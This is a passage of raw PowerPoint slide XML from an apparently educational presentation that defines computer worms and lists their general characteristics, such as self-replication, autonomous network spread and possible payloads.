              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3252982" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>
                <a:gd name="T19"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28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15" y="6"/>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
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2490389" y="1183843"/>
              <a:ext cx="324050" cy="326134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 50"/>
                <a:gd name="T1" fmla="*/ 48 h 48"/>
                <a:gd name="T2" fmla="*/ 10 w 50"/>
                <a:gd name="T3" fmla="*/ 47 h 48"/>
                <a:gd name="T4" fmla="*/ 9 w 50"/>
                <a:gd name="T5" fmla="*/ 44 h 48"/>
                <a:gd name="T6" fmla="*/ 11 w 50"/>
                <a:gd name="T7" fmla="*/ 30 h 48"/>
                <a:gd name="T8" fmla="*/ 1 w 50"/>
                <a:gd name="T9" fmla="*/ 21 h 48"/>
                <a:gd name="T10" fmla="*/ 1 w 50"/>
                <a:gd name="T11" fmla="*/ 18 h 48"/>
                <a:gd name="T12" fmla="*/ 3 w 50"/>
                <a:gd name="T13" fmla="*/ 16 h 48"/>
                <a:gd name="T14" fmla="*/ 17 w 50"/>
                <a:gd name="T15" fmla="*/ 14 h 48"/>
                <a:gd name="T16" fmla="*/ 23 w 50"/>
                <a:gd name="T17" fmla="*/ 2 h 48"/>
                <a:gd name="T18" fmla="*/ 28 w 50"/>
                <a:gd name="T19" fmla="*/ 2 h 48"/>
                <a:gd name="T20" fmla="*/ 34 w 50"/>
                <a:gd name="T21" fmla="*/ 14 h 48"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 16 h 48"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 18 h 48"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 21 h 48"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 30 h 48"/>
                <a:gd name="T30" fmla="*/ 42 w 50"/>
                <a:gd name="T31" fmla="*/ 44 h 48"/>
                <a:gd name="T32" fmla="*/ 41 w 50"/>
                <a:gd name="T33" fmla="*/ 47 h 48"/>
                <a:gd name="T34" fmla="*/ 37 w 50"/>
                <a:gd name="T35" fmla="*/ 47 h 48"/>
                <a:gd name="T36" fmla="*/ 25 w 50"/>
                <a:gd name="T37" fmla="*/ 41 h 48"/>
                <a:gd name="T38" fmla="*/ 13 w 50"/>
                <a:gd name="T39" fmla="*/ 47 h 48"/>
                <a:gd name="T40" fmla="*/ 12 w 50"/>
                <a:gd name="T41" fmla="*/ 48 h 48"/>
                <a:gd name="T42" fmla="*/ 25 w 50"/>
                <a:gd name="T43" fmla="*/ 34 h 48"/>
                <a:gd name="T44" fmla="*/ 27 w 50"/>
                <a:gd name="T45" fmla="*/ 35 h 48"/>
                <a:gd name="T46" fmla="*/ 35 w 50"/>
                <a:gd name="T47" fmla="*/ 39 h 48"/>
                <a:gd name="T48" fmla="*/ 33 w 50"/>
                <a:gd name="T49" fmla="*/ 30 h 48"/>
                <a:gd name="T50" fmla="*/ 34 w 50"/>
                <a:gd name="T51" fmla="*/ 27 h 48"/>
                <a:gd name="T52" fmla="*/ 41 w 50"/>
                <a:gd name="T53" fmla="*/ 21 h 48"/>
                <a:gd name="T54" fmla="*/ 32 w 50"/>
                <a:gd name="T55" fmla="*/ 20 h 48"/>
                <a:gd name="T56" fmla="*/ 29 w 50"/>
                <a:gd name="T57" fmla="*/ 18 h 48"/>
                <a:gd name="T58" fmla="*/ 25 w 50"/>
                <a:gd name="T59" fmla="*/ 10 h 48"/>
                <a:gd name="T60" fmla="*/ 21 w 50"/>
                <a:gd name="T61" fmla="*/ 18 h 48"/>
                <a:gd name="T62" fmla="*/ 19 w 50"/>
                <a:gd name="T63" fmla="*/ 20 h 48"/>
                <a:gd name="T64" fmla="*/ 10 w 50"/>
                <a:gd name="T65" fmla="*/ 21 h 48"/>
                <a:gd name="T66" fmla="*/ 17 w 50"/>
                <a:gd name="T67" fmla="*/ 27 h 48"/>
                <a:gd name="T68" fmla="*/ 17 w 50"/>
                <a:gd name="T69" fmla="*/ 30 h 48"/>
                <a:gd name="T70" fmla="*/ 16 w 50"/>
                <a:gd name="T71" fmla="*/ 39 h 48"/>
                <a:gd name="T72" fmla="*/ 24 w 50"/>
                <a:gd name="T73" fmla="*/ 35 h 48"/>
                <a:gd name="T74" fmla="*/ 25 w 50"/>
                <a:gd name="T75"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48">
                  <a:moveTo>
                    <a:pt x="12" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="48"/>
                    <a:pt x="11" y="47"/>
                    <a:pt x="10" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="46"/>
                    <a:pt x="9" y="45"/>
                    <a:pt x="9" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="1" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="2" y="16"/>
                    <a:pt x="3" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="28" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="34" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                    <a:pt x="48" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="16"/>
                    <a:pt x="50" y="17"/>
                    <a:pt x="50" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="19"/>
                    <a:pt x="50" y="20"/>
                    <a:pt x="49" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                    <a:pt x="40" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                    <a:pt x="42" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="45"/>
                    <a:pt x="42" y="46"/>
                    <a:pt x="41" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="48"/>
                    <a:pt x="39" y="48"/>
                    <a:pt x="37" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                    <a:pt x="25" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                    <a:pt x="13" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="34"/>
                    <a:pt x="26" y="35"/>
                    <a:pt x="27" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                    <a:pt x="35" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="33" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="29"/>
                    <a:pt x="34" y="28"/>
                    <a:pt x="34" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                    <a:pt x="41" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                    <a:pt x="32" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="19"/>
                    <a:pt x="30" y="19"/>
                    <a:pt x="29" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                    <a:pt x="25" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                    <a:pt x="21" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="19"/>
                    <a:pt x="20" y="19"/>
                    <a:pt x="19" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                    <a:pt x="17" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="28"/>
                    <a:pt x="18" y="29"/>
                    <a:pt x="17" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="35"/>
                    <a:pt x="25" y="34"/>
                    <a:pt x="25" y="34"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="5C52FB"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EFB61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pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="图形 17" descr="templates\docerresourceshop\icons\\32313535373331353b32313535373332313bc8cbb9a4d6c7c4dcbbfac6f7c8cb"/>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9506485" y="4632711"/>
              <a:ext cx="1260000" cy="1260000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132205" y="1837690"/>
            <a:ext cx="9498965" cy="301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533400" algn="just">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId14"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms are designed to self-replicate and spread independently across computer networks and systems. Unlike viruses, which need a host file or program to attach to, worms operate as standalone programs with the primary goal of infecting as many devices and systems as possible. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="3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Key Characteristics</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8"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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="455295" y="1238885"/>
            <a:ext cx="10528935" cy="4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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Self-Replication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Create copies of themselves without requiring a host program. generate multiple instances of their code and distribute these copies to other vulnerable systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Autonomous Spreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Spread automatically across networks and devices. exploit vulnerabilities in operating systems or software to gain access to target systems. Once inside, they seek out and infect other vulnerable devices on the same network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="3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Key Characteristics</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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="455295" y="1238885"/>
            <a:ext cx="10528935" cy="490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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>No User Intervention Required:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Unlike many other types of malware that rely on user actions (such as opening an infected file or clicking on a link), worms can spread without any user interaction. Their autonomous spreading mechanism makes them highly efficient at propagation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Network-Based:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  Spread through computer networks, including the internet. They can rapidly move from one device to another, making them a significant threat to network security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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rPr>
              <a:t>Key Characteristics</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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="455295" y="1238885"/>
            <a:ext cx="10528935" cy="490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3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> While the primary purpose of worms is to spread, they may also carry a payload, which could be a malicious action such as deleting files, stealing data, or installing a backdoor for remote control. The payload varies depending on the specific worm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Widespread Impact:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  Worms can have a significant impact on both individual systems and entire networks. They can overload network resources, slow down system performance, and disrupt normal operations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:alpha val="91765"/>
            </a:sysClr>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278630" y="2934653"/>
            <a:ext cx="7913370" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="09DEE9">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="09DEE9">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
